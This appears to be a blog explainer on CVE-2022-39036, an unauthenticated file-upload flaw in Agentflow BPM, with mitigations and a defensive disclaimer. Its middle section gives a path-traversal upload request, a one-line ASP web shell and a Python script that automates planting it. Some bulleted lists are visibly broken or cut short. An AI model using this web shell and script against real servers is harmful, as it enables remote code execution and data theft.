Agentflow BPM is a workflow and business process management platform used in many organizations to automate their business processes. While it offers useful features, a dangerous security flaw—CVE-2022-39036—was discovered in its file upload feature. This vulnerability lets an attacker upload malicious files and run arbitrary code on the server with little to no effort and no authentication required.
Let’s break down what this means, how it works, and how attackers could use it in real-world attacks.
What is CVE-2022-39036?
CVE-2022-39036 is a vulnerability found in Agentflow BPM where the application does not properly filter special characters in file upload URLs. This allows an unauthenticated remote attacker to:
- Upload any file type (including PHP/ASP/JSP scripts)
How Does the Vulnerability Work?
A common feature in any business process platform is the ability to upload documents (like receipts, PDFs, etc.). A secure application should:
Restrict upload locations
But Agentflow BPM failed to do so for upload URLs.
By crafting a special request, attackers can upload arbitrary files—even executable scripts—to the webroot or another location where they can be executed on the server!
> “Insufficient filtering for special characters in URLs” means the application doesn’t filter out dangerous path traversal characters (../) or special file extensions (.php, .asp, etc.).
Suppose Agentflow BPM has an endpoint like
POST /bpm/file/upload HTTP/1.1
A legit upload might look like
POST /bpm/file/upload HTTP/1.1
Host: agentflow.example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="document.pdf"
Content-Type: application/pdf
%PDF-1.4 binary content...
------WebKitFormBoundary--
But the attacker uses special characters in the filename
POST /bpm/file/upload HTTP/1.1
Host: agentflow.example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="../../../../webroot/shell.asp"
Content-Type: application/octet-stream
<%eval request("pass")%>
------WebKitFormBoundary--
After upload, the attacker can visit
http://agentflow.example.com/shell.asp?pass=malicious_code
Now, they can run code of their choice on the server.
Here’s a Python code snippet using requests to automate the exploit
import requests
url = "http://agentflow.example.com/bpm/file/upload";
files = {
"file": ("../../../../webroot/shell.asp", '<%eval request("pass")%>', "application/octet-stream"),
}
response = requests.post(url, files=files)
print(response.text) # Should report successful upload
Potential Impact
- Remote Code Execution (RCE): The attacker can run any code, steal data, or create new administrator accounts.
Service Disruption: Taking the site or business process offline.
- Data Theft/Ransomware: Stealing or encrypting sensitive documents.
Pivot to further attacks within the internal company network.
Attackers don’t require a login, making automated large-scale attacks possible.
References & Further Reading
- National Vulnerability Database: CVE-2022-39036
- AgentFlow Website
- SecurityFocus BID 70674
- Common File Upload Vulnerabilities
- Example of Web Shells
Update Agentflow BPM to the latest version; patches should block this attack.
- Restrict file types and sanitize file paths/names in upload code.
Conclusion
CVE-2022-39036 is a critical security hole in Agentflow BPM that makes it dangerously easy for attackers to take over or disrupt a system. If you run Agentflow BPM, update your platform immediately and check for signs of compromise. For defenders, always scrutinize file upload features—it’s one of the oldest and most dangerous web app attack vectors out there.
> Note: This post is provided for educational and defensive purposes only. Do not attempt to exploit systems without authorization.
Timeline
Published on: 11/10/2022 15:15:00 UTC
Last modified on: 11/10/2022 15:22:00 UTC